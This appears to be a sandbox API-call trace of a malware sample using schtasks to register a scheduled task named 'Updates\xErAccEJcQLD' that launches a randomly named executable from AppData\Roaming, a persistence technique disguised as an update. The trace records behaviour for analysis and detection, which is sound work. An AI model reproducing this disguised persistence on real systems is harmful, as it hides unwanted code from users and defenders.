[0193.577] _vsnwprintf (in: _Buffer=0x47795e8, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|XML|") returned 5
[0193.577] lstrlenW (lpString="|ru|") returned 4
[0193.578] lstrlenW (lpString="|XML|") returned 5
[0193.578] RtlRestoreLastWin32Error () returned 0x490
[0193.578] lstrlenW (lpString="rp") returned 2
[0193.578] lstrlenW (lpString="rp") returned 2
[0193.578] _memicmp (_Buf1=0x4777348, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.578] lstrlenW (lpString="XML") returned 3
[0193.578] _memicmp (_Buf1=0x47773a8, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.578] _vsnwprintf (in: _Buffer=0x4779448, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|rp|") returned 4
[0193.578] _vsnwprintf (in: _Buffer=0x47795e8, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|XML|") returned 5
[0193.578] lstrlenW (lpString="|rp|") returned 4
[0193.578] lstrlenW (lpString="|XML|") returned 5
[0193.578] RtlRestoreLastWin32Error () returned 0x490
[0193.578] lstrlenW (lpString="sc") returned 2
[0193.578] lstrlenW (lpString="sc") returned 2
[0193.578] _memicmp (_Buf1=0x4777348, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.578] lstrlenW (lpString="XML") returned 3
[0193.578] _memicmp (_Buf1=0x47773a8, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.578] _vsnwprintf (in: _Buffer=0x4779448, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|sc|") returned 4
[0193.578] _vsnwprintf (in: _Buffer=0x47795e8, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|XML|") returned 5
[0193.578] lstrlenW (lpString="|sc|") returned 4
[0193.578] lstrlenW (lpString="|XML|") returned 5
[0193.578] RtlRestoreLastWin32Error () returned 0x490
[0193.578] lstrlenW (lpString="mo") returned 2
[0193.578] lstrlenW (lpString="mo") returned 2
[0193.578] _memicmp (_Buf1=0x4777348, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.578] lstrlenW (lpString="XML") returned 3
[0193.578] _memicmp (_Buf1=0x47773a8, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.578] _vsnwprintf (in: _Buffer=0x4779448, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|mo|") returned 4
[0193.579] _vsnwprintf (in: _Buffer=0x47795e8, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|XML|") returned 5
[0193.579] lstrlenW (lpString="|mo|") returned 4
[0193.579] lstrlenW (lpString="|XML|") returned 5
[0193.579] RtlRestoreLastWin32Error () returned 0x490
[0193.579] lstrlenW (lpString="d") returned 1
[0193.579] lstrlenW (lpString="d") returned 1
[0193.579] _memicmp (_Buf1=0x4777348, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.579] lstrlenW (lpString="XML") returned 3
[0193.579] _memicmp (_Buf1=0x47773a8, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.579] _vsnwprintf (in: _Buffer=0x4779448, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|d|") returned 3
[0193.579] _vsnwprintf (in: _Buffer=0x47795e8, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|XML|") returned 5
[0193.579] lstrlenW (lpString="|d|") returned 3
[0193.579] lstrlenW (lpString="|XML|") returned 5
[0193.579] RtlRestoreLastWin32Error () returned 0x490
[0193.579] lstrlenW (lpString="m") returned 1
[0193.579] lstrlenW (lpString="m") returned 1
[0193.579] _memicmp (_Buf1=0x4777348, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.579] lstrlenW (lpString="XML") returned 3
[0193.579] _memicmp (_Buf1=0x47773a8, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.579] _vsnwprintf (in: _Buffer=0x4779448, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|m|") returned 3
[0193.579] _vsnwprintf (in: _Buffer=0x47795e8, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|XML|") returned 5
[0193.579] lstrlenW (lpString="|m|") returned 3
[0193.579] lstrlenW (lpString="|XML|") returned 5
[0193.579] RtlRestoreLastWin32Error () returned 0x490
[0193.579] lstrlenW (lpString="i") returned 1
[0193.579] lstrlenW (lpString="i") returned 1
[0193.579] _memicmp (_Buf1=0x4777348, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.579] lstrlenW (lpString="XML") returned 3
[0193.579] _memicmp (_Buf1=0x47773a8, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.579] _vsnwprintf (in: _Buffer=0x4779448, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|i|") returned 3
[0193.580] _vsnwprintf (in: _Buffer=0x47795e8, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|XML|") returned 5
[0193.580] lstrlenW (lpString="|i|") returned 3
[0193.580] lstrlenW (lpString="|XML|") returned 5
[0193.580] RtlRestoreLastWin32Error () returned 0x490
[0193.580] lstrlenW (lpString="tn") returned 2
[0193.580] lstrlenW (lpString="tn") returned 2
[0193.580] _memicmp (_Buf1=0x4777348, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.580] lstrlenW (lpString="XML") returned 3
[0193.580] _memicmp (_Buf1=0x47773a8, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.580] _vsnwprintf (in: _Buffer=0x4779448, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|tn|") returned 4
[0193.580] _vsnwprintf (in: _Buffer=0x47795e8, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|XML|") returned 5
[0193.580] lstrlenW (lpString="|tn|") returned 4
[0193.580] lstrlenW (lpString="|XML|") returned 5
[0193.580] RtlRestoreLastWin32Error () returned 0x490
[0193.580] lstrlenW (lpString="tr") returned 2
[0193.580] lstrlenW (lpString="tr") returned 2
[0193.580] _memicmp (_Buf1=0x4777348, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.580] lstrlenW (lpString="XML") returned 3
[0193.580] _memicmp (_Buf1=0x47773a8, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.580] _vsnwprintf (in: _Buffer=0x4779448, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|tr|") returned 4
[0193.580] _vsnwprintf (in: _Buffer=0x47795e8, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|XML|") returned 5
[0193.580] lstrlenW (lpString="|tr|") returned 4
[0193.580] lstrlenW (lpString="|XML|") returned 5
[0193.580] RtlRestoreLastWin32Error () returned 0x490
[0193.580] lstrlenW (lpString="st") returned 2
[0193.580] lstrlenW (lpString="st") returned 2
[0193.580] _memicmp (_Buf1=0x4777348, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.581] lstrlenW (lpString="XML") returned 3
[0193.581] _memicmp (_Buf1=0x47773a8, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.581] _vsnwprintf (in: _Buffer=0x4779448, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|st|") returned 4
[0193.581] _vsnwprintf (in: _Buffer=0x47795e8, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|XML|") returned 5
[0193.581] lstrlenW (lpString="|st|") returned 4
[0193.581] lstrlenW (lpString="|XML|") returned 5
[0193.581] RtlRestoreLastWin32Error () returned 0x490
[0193.581] lstrlenW (lpString="sd") returned 2
[0193.581] lstrlenW (lpString="sd") returned 2
[0193.581] _memicmp (_Buf1=0x4777348, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.585] lstrlenW (lpString="XML") returned 3
[0193.585] _memicmp (_Buf1=0x47773a8, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.585] _vsnwprintf (in: _Buffer=0x4779448, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|sd|") returned 4
[0193.585] _vsnwprintf (in: _Buffer=0x47795e8, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|XML|") returned 5
[0193.585] lstrlenW (lpString="|sd|") returned 4
[0193.585] lstrlenW (lpString="|XML|") returned 5
[0193.585] RtlRestoreLastWin32Error () returned 0x490
[0193.586] lstrlenW (lpString="ed") returned 2
[0193.586] lstrlenW (lpString="ed") returned 2
[0193.586] _memicmp (_Buf1=0x4777348, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.586] lstrlenW (lpString="XML") returned 3
[0193.586] _memicmp (_Buf1=0x47773a8, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.586] _vsnwprintf (in: _Buffer=0x4779448, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|ed|") returned 4
[0193.586] _vsnwprintf (in: _Buffer=0x47795e8, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|XML|") returned 5
[0193.586] lstrlenW (lpString="|ed|") returned 4
[0193.586] lstrlenW (lpString="|XML|") returned 5
[0193.586] RtlRestoreLastWin32Error () returned 0x490
[0193.586] lstrlenW (lpString="it") returned 2
[0193.586] lstrlenW (lpString="it") returned 2
[0193.586] _memicmp (_Buf1=0x4777348, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.586] lstrlenW (lpString="XML") returned 3
[0193.586] _memicmp (_Buf1=0x47773a8, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.586] _vsnwprintf (in: _Buffer=0x4779448, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|it|") returned 4
[0193.586] _vsnwprintf (in: _Buffer=0x47795e8, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|XML|") returned 5
[0193.586] lstrlenW (lpString="|it|") returned 4
[0193.586] lstrlenW (lpString="|XML|") returned 5
[0193.586] RtlRestoreLastWin32Error () returned 0x490
[0193.586] lstrlenW (lpString="et") returned 2
[0193.586] lstrlenW (lpString="et") returned 2
[0193.586] _memicmp (_Buf1=0x4777348, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.586] lstrlenW (lpString="XML") returned 3
[0193.586] _memicmp (_Buf1=0x47773a8, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.586] _vsnwprintf (in: _Buffer=0x4779448, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|et|") returned 4
[0193.586] _vsnwprintf (in: _Buffer=0x47795e8, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|XML|") returned 5
[0193.586] lstrlenW (lpString="|et|") returned 4
[0193.586] lstrlenW (lpString="|XML|") returned 5
[0193.586] RtlRestoreLastWin32Error () returned 0x490
[0193.587] lstrlenW (lpString="k") returned 1
[0193.587] lstrlenW (lpString="k") returned 1
[0193.587] _memicmp (_Buf1=0x4777348, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.587] lstrlenW (lpString="XML") returned 3
[0193.587] _memicmp (_Buf1=0x47773a8, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.587] _vsnwprintf (in: _Buffer=0x4779448, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|k|") returned 3
[0193.587] _vsnwprintf (in: _Buffer=0x47795e8, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|XML|") returned 5
[0193.587] lstrlenW (lpString="|k|") returned 3
[0193.587] lstrlenW (lpString="|XML|") returned 5
[0193.587] RtlRestoreLastWin32Error () returned 0x490
[0193.587] lstrlenW (lpString="du") returned 2
[0193.587] lstrlenW (lpString="du") returned 2
[0193.596] _memicmp (_Buf1=0x4777348, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.596] lstrlenW (lpString="XML") returned 3
[0193.596] _memicmp (_Buf1=0x47773a8, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.596] _vsnwprintf (in: _Buffer=0x4779448, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|du|") returned 4
[0193.596] _vsnwprintf (in: _Buffer=0x47795e8, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|XML|") returned 5
[0193.596] lstrlenW (lpString="|du|") returned 4
[0193.596] lstrlenW (lpString="|XML|") returned 5
[0193.596] RtlRestoreLastWin32Error () returned 0x490
[0193.596] lstrlenW (lpString="ri") returned 2
[0193.596] lstrlenW (lpString="ri") returned 2
[0193.596] _memicmp (_Buf1=0x4777348, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.596] lstrlenW (lpString="XML") returned 3
[0193.596] _memicmp (_Buf1=0x47773a8, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.596] _vsnwprintf (in: _Buffer=0x4779448, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|ri|") returned 4
[0193.597] _vsnwprintf (in: _Buffer=0x47795e8, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|XML|") returned 5
[0193.597] lstrlenW (lpString="|ri|") returned 4
[0193.597] lstrlenW (lpString="|XML|") returned 5
[0193.597] RtlRestoreLastWin32Error () returned 0x490
[0193.597] lstrlenW (lpString="z") returned 1
[0193.597] lstrlenW (lpString="z") returned 1
[0193.597] _memicmp (_Buf1=0x4777348, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.597] lstrlenW (lpString="XML") returned 3
[0193.597] _memicmp (_Buf1=0x47773a8, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.597] _vsnwprintf (in: _Buffer=0x4779448, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|z|") returned 3
[0193.597] _vsnwprintf (in: _Buffer=0x47795e8, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|XML|") returned 5
[0193.597] lstrlenW (lpString="|z|") returned 3
[0193.597] lstrlenW (lpString="|XML|") returned 5
[0193.597] RtlRestoreLastWin32Error () returned 0x490
[0193.597] lstrlenW (lpString="f") returned 1
[0193.597] lstrlenW (lpString="f") returned 1
[0193.597] _memicmp (_Buf1=0x4777348, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.597] lstrlenW (lpString="XML") returned 3
[0193.597] _memicmp (_Buf1=0x47773a8, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.597] _vsnwprintf (in: _Buffer=0x4779448, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|f|") returned 3
[0193.597] _vsnwprintf (in: _Buffer=0x47795e8, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|XML|") returned 5
[0193.597] lstrlenW (lpString="|f|") returned 3
[0193.597] lstrlenW (lpString="|XML|") returned 5
[0193.597] RtlRestoreLastWin32Error () returned 0x490
[0193.597] lstrlenW (lpString="v1") returned 2
[0193.597] lstrlenW (lpString="v1") returned 2
[0193.597] _memicmp (_Buf1=0x4777348, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.597] lstrlenW (lpString="XML") returned 3
[0193.598] _memicmp (_Buf1=0x47773a8, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.598] _vsnwprintf (in: _Buffer=0x4779448, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|v1|") returned 4
[0193.598] _vsnwprintf (in: _Buffer=0x47795e8, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|XML|") returned 5
[0193.598] lstrlenW (lpString="|v1|") returned 4
[0193.598] lstrlenW (lpString="|XML|") returned 5
[0193.598] RtlRestoreLastWin32Error () returned 0x490
[0193.598] lstrlenW (lpString="xml") returned 3
[0193.598] lstrlenW (lpString="xml") returned 3
[0193.598] _memicmp (_Buf1=0x4777348, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.598] lstrlenW (lpString="XML") returned 3
[0193.598] _memicmp (_Buf1=0x47773a8, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.598] _vsnwprintf (in: _Buffer=0x4779448, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|xml|") returned 5
[0193.598] _vsnwprintf (in: _Buffer=0x47795e8, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|XML|") returned 5
[0193.598] lstrlenW (lpString="|xml|") returned 5
[0193.598] lstrlenW (lpString="|XML|") returned 5
[0193.598] StrStrIW (lpFirst="|xml|", lpSrch="|XML|") returned="|xml|"
[0193.598] RtlRestoreLastWin32Error () returned 0x0
[0193.598] RtlRestoreLastWin32Error () returned 0x0
[0193.598] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\tmp2010.tmp") returned 52
[0193.598] lstrlenW (lpString="-/") returned 2
[0193.598] StrChrIW (lpStart="-/", wMatch=0x4a30043) returned 0x0
[0193.598] RtlRestoreLastWin32Error () returned 0x490
[0193.598] RtlRestoreLastWin32Error () returned 0x490
[0193.599] RtlRestoreLastWin32Error () returned 0x0
[0193.599] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\tmp2010.tmp") returned 52
[0193.599] StrChrIW (lpStart="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\tmp2010.tmp", wMatch=0x3a) returned=":\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\tmp2010.tmp"
[0193.599] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\tmp2010.tmp") returned 52
[0193.599] _memicmp (_Buf1=0x47774b0, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.599] _memicmp (_Buf1=0x477aaa8, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.599] RtlRestoreLastWin32Error () returned 0x7a
[0193.599] RtlRestoreLastWin32Error () returned 0x0
[0193.599] RtlRestoreLastWin32Error () returned 0x0
[0193.599] lstrlenW (lpString="C") returned 1
[0193.599] RtlRestoreLastWin32Error () returned 0x490
[0193.599] RtlRestoreLastWin32Error () returned 0x0
[0193.599] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\tmp2010.tmp") returned 52
[0193.599] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\tmp2010.tmp") returned 52
[0193.599] GetProcessHeap () returned 0x4770000
[0193.599] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x6a) returned 0x477ae20
[0193.599] RtlRestoreLastWin32Error () returned 0x0
[0193.599] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\tmp2010.tmp") returned 52
[0193.599] RtlRestoreLastWin32Error () returned 0x0
[0193.599] GetProcessHeap () returned 0x4770000
[0193.599] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x1fc) returned 0x4779db8
[0193.600] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
[0193.607] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x1, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0
[0193.624] CoCreateInstance (in: rclsid=0x3a26c0*(Data1=0xf87369f, Data2=0xa4e5, Data3=0x4cfc, Data4=([0]=0xbd, [1]=0x3e, [2]=0x73, [3]=0xe6, [4]=0x15, [5]=0x45, [6]=0x72, [7]=0xdd)), pUnkOuter=0x0, dwClsContext=0x17, riid=0x3a26d0*(Data1=0x2faba4c7, Data2=0x4da9, Data3=0x4013, Data4=([0]=0x96, [1]=0x97, [2]=0x20, [3]=0xcc, [4]=0x3f, [5]=0xd4, [6]=0xf, [7]=0x85)), ppv=0xdd39c | out: ppv=0xdd39c*=0x4a33758) returned 0x0
[0194.208] TaskScheduler:ITaskService:Connect (This=0x4a33758, serverName=0xdd34c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), user=0xdd35c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), domain=0xdd36c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), password=0xdd37c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0)) returned 0x0
[0194.217] TaskScheduler:ITaskService:GetFolder (in: This=0x4a33758, Path=0x0, ppFolder=0xdd464 | out: ppFolder=0xdd464*=0x4a33880) returned 0x0
[0194.220] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\tmp2010.tmp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\tmp2010.tmp"), dwDesiredAccess=0x80000000, dwShareMode=0x5, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x128
[0194.221] GetFileSizeEx (in: hFile=0x128, lpFileSize=0xdcd7c | out: lpFileSize=0xdcd7c*=1646) returned 1
[0194.221] ReadFile (in: hFile=0x128, lpBuffer=0xdcd8c, nNumberOfBytesToRead=0x2, lpNumberOfBytesRead=0xdcd88, lpOverlapped=0x0 | out: lpBuffer=0xdcd8c*, lpNumberOfBytesRead=0xdcd88*=0x2, lpOverlapped=0x0) returned 1
[0194.221] SetFilePointer (in: hFile=0x128, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
[0194.221] malloc (_Size=0x66f) returned 0x4a338d0
[0194.222] ReadFile (in: hFile=0x128, lpBuffer=0x4a338d0, nNumberOfBytesToRead=0x66f, lpNumberOfBytesRead=0xdcd88, lpOverlapped=0x0 | out: lpBuffer=0x4a338d0*, lpNumberOfBytesRead=0xdcd88*=0x66e, lpOverlapped=0x0) returned 1
[0194.222] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr=0x4a338d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 1647
[0194.222] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr=0x4a338d0, cbMultiByte=-1, lpWideCharStr=0x478a74c, cchWideChar=1647 | out: lpWideCharStr="\r\n\r\n \r\n 2014-10-25T14:27:44.8929027\r\n XC64ZB\\RDhJ0CNFevzX\r\n \r\n \r\n \r\n true\r\n XC64ZB\\RDhJ0CNFevzX\r\n \r\n \r\n false\r\n \r\n \r\n \r\n \r\n XC64ZB\\RDhJ0CNFevzX\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n StopExisting\r\n false\r\n true\r\n false\r\n true\r\n false\r\n \r\n true\r\n false\r\n \r\n true\r\n true\r\n false\r\n false\r\n false\r\n PT0S\r\n 7\r\n \r\n \r\n \r\n C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\xErAccEJcQLD.exe\r\n \r\n \r\n") returned 1647
[0194.222] SysStringLen (param_1="\r\n\r\n \r\n 2014-10-25T14:27:44.8929027\r\n XC64ZB\\RDhJ0CNFevzX\r\n \r\n \r\n \r\n true\r\n XC64ZB\\RDhJ0CNFevzX\r\n \r\n \r\n false\r\n \r\n \r\n \r\n \r\n XC64ZB\\RDhJ0CNFevzX\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n StopExisting\r\n false\r\n true\r\n false\r\n true\r\n false\r\n \r\n true\r\n false\r\n \r\n true\r\n true\r\n false\r\n false\r\n false\r\n PT0S\r\n 7\r\n \r\n \r\n \r\n C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\xErAccEJcQLD.exe\r\n \r\n \r\n") returned 0x66e
[0194.222] VarBstrCat (in: bstrLeft=0x0, bstrRight="\r\n\r\n \r\n 2014-10-25T14:27:44.8929027\r\n XC64ZB\\RDhJ0CNFevzX\r\n \r\n \r\n \r\n true\r\n XC64ZB\\RDhJ0CNFevzX\r\n \r\n \r\n false\r\n \r\n \r\n \r\n \r\n XC64ZB\\RDhJ0CNFevzX\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n StopExisting\r\n false\r\n true\r\n false\r\n true\r\n false\r\n \r\n true\r\n false\r\n \r\n true\r\n true\r\n false\r\n false\r\n false\r\n PT0S\r\n 7\r\n \r\n \r\n \r\n C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\xErAccEJcQLD.exe\r\n \r\n \r\n", pbstrResult=0xdcd2c | out: pbstrResult=0xdcd2c) returned 0x0
[0194.222] free (_Block=0x4a338d0)
[0194.222] CloseHandle (hObject=0x128) returned 1
[0194.223] lstrlenW (lpString="") returned 0
[0194.224] malloc (_Size=0xc) returned 0x4a33830
[0194.224] SysStringLen (param_1="") returned 0x0
[0194.224] free (_Block=0x4a33830)
[0194.224] lstrlenW (lpString="") returned 0
[0194.224] ITaskFolder:RegisterTask (in: This=0x4a33880, Path="Updates\\xErAccEJcQLD", XmlText="\r\n\r\n \r\n 2014-10-25T14:27:44.8929027\r\n XC64ZB\\RDhJ0CNFevzX\r\n \r\n \r\n \r\n true\r\n XC64ZB\\RDhJ0CNFevzX\r\n \r\n \r\n false\r\n \r\n \r\n \r\n \r\n XC64ZB\\RDhJ0CNFevzX\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n StopExisting\r\n false\r\n true\r\n false\r\n true\r\n false\r\n \r\n true\r\n false\r\n \r\n true\r\n true\r\n false\r\n false\r\n false\r\n PT0S\r\n 7\r\n \r\n \r\n \r\n C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\xErAccEJcQLD.exe\r\n \r\n \r\n", flags=2, UserId=0xdcd60*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="", varVal2=0x0), password=0xdcd70*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), LogonType=0, sddl=0xdcd84*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), ppTask=0xdcde0 | out: ppTask=0xdcde0*=0x4a33908) returned 0x0
[0195.475] GetProcessHeap () returned 0x4770000
[0195.475] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x14) returned 0x4781e50
[0195.475] _memicmp (_Buf1=0x4777468, _Buf2=0x3a2708, _Size=0x7) returned 0
[0195.475] LoadStringW (in: hInstance=0x0, uID=0x12e, lpBuffer=0x477a798, cchBufferMax=256 | out: lpBuffer="SUCCESS: The scheduled task \"%s\" has successfully been created.\n") returned 0x40
[0195.475] lstrlenW (lpString="SUCCESS: The scheduled task \"%s\" has successfully been created.\n") returned 64
[0195.475] GetProcessHeap () returned 0x4770000
[0195.475] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x82) returned 0x47892c0
[0195.475] _vsnwprintf (in: _Buffer=0xdcdf8, _BufferCount=0x1fb, _Format="SUCCESS: The scheduled task \"%s\" has successfully been created.\n", _ArgList=0xdcd94 | out: _Buffer="SUCCESS: The scheduled task \"Updates\\xErAccEJcQLD\" has successfully been created.\n") returned 82
[0195.475] __iob_func () returned 0x74341208
[0195.476] _fileno (_File=0x74341228) returned 1
[0195.476] _errno () returned 0x4a305b0
[0195.476] _get_osfhandle (_FileHandle=1) returned 0x3c
[0195.476] _errno () returned 0x4a305b0
[0195.476] GetFileType (hFile=0x3c) returned 0x2
[0195.476] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c
[0195.476] GetFileType (hFile=0x3c) returned 0x2
[0195.476] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xdcd68 | out: lpMode=0xdcd68) returned 1
[0195.477] __iob_func () returned 0x74341208
[0195.477] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c
[0195.477] lstrlenW (lpString="SUCCESS: The scheduled task \"Updates\\xErAccEJcQLD\" has successfully been created.\n") returned 82
[0195.477] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0xdcdf8*, nNumberOfCharsToWrite=0x52, lpNumberOfCharsWritten=0xdcd8c, lpReserved=0x0 | out: lpBuffer=0xdcdf8*, lpNumberOfCharsWritten=0xdcd8c*=0x52) returned 1
[0195.482] IUnknown:Release (This=0x4a33908) returned 0x0
[0195.482] TaskScheduler:IUnknown:Release (This=0x4a33880) returned 0x0
[0195.482] TaskScheduler:IUnknown:Release (This=0x4a33758) returned 0x0
[0195.482] lstrlenW (lpString="") returned 0
[0195.482] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\tmp2010.tmp") returned 52
[0195.482] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\tmp2010.tmp", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 53
